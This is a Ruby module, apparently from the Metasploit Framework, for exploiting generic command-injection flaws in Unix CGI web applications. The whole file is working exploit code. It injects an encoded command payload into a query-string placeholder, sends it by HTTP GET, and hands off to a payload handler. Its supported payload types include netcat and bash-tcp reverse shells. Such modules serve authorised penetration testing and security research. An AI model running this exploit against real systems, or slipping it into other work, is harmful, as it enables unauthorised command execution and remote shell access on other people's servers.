rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/generic_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
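# Generic command-execution module for CGI-style web applications on
# Unix-like platforms. The operator supplies a URI (CMDURI) whose query string
# contains the literal placeholder XXcmdXX; the module replaces that placeholder
# with the encoded command payload and issues one HTTP GET request.
#
# NOTE(review): the command travels in the query string of a GET request, so
# it is typically recorded in web server access logs (URL-encoded) - useful
# when reviewing a host this module was run against in an authorised test.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the single CMDURI option.
  #
  # @param info [Hash] metadata overrides, merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Generic Web Application Unix Command Execution',
        'Description' => %q{
          This module can be used to exploit any generic command execution vulnerability
          for CGI applications on Unix-like platforms. To use this module, specify the
          CMDURI path, replacing the command itself with XXcmdXX. This module is currently
          limited to forms vulnerable through GET requests with query parameters.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [ ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',
            }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '1993-11-14', # CGI historical date :)
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('CMDURI', [true, "The full URI path with the XXcmdXX parameter", "/cgi-bin/generic?cmd=XXcmdXX"]),
      ]
    )
  end

  # Builds the request URI from CMDURI, sends it, reports the HTTP status and
  # hands control to the framework's payload handler.
  #
  # Only the query string is rewritten: each "key=value" pair is split, the
  # XXcmdXX placeholder inside the value is replaced with the encoded payload,
  # and key and value are URI-encoded before the pairs are re-joined.
  #
  # NOTE(review): a CMDURI whose query string does not contain XXcmdXX (or that
  # has no query string at all) is sent unchanged, without any payload.
  def exploit
    uri = datastore['CMDURI'].to_s
    uri, query = uri.split('?', 2)

    if query
      query = query.split('&').map { |var|
        k, v = var.split('=', 2)

        # A parameter without '=' (e.g. "?flag&cmd=XXcmdXX") or an empty segment
        # ("a=1&&b=2") leaves v - and possibly k - nil. Previously this raised
        # NoMethodError on v.gsub; such segments are now passed through encoded,
        # without an added '='.
        next Rex::Text.uri_encode(k.to_s) if v.nil?

        Rex::Text.uri_encode(k) + "=" + Rex::Text.uri_encode(v.gsub("XXcmdXX", payload.encoded))
      }.join('&')
      uri = uri + '?' + query
    end

    print_status("Sending HTTP request for #{uri}")

    # Second argument is the response timeout in seconds.
    res = send_request_cgi({
      'global' => true,
      'uri' => uri
    }, 30)

    if res
      print_status("The server responded with HTTP CODE #{res.code}")
    else
      print_status("The server did not respond to our request")
    end

    handler
  end
end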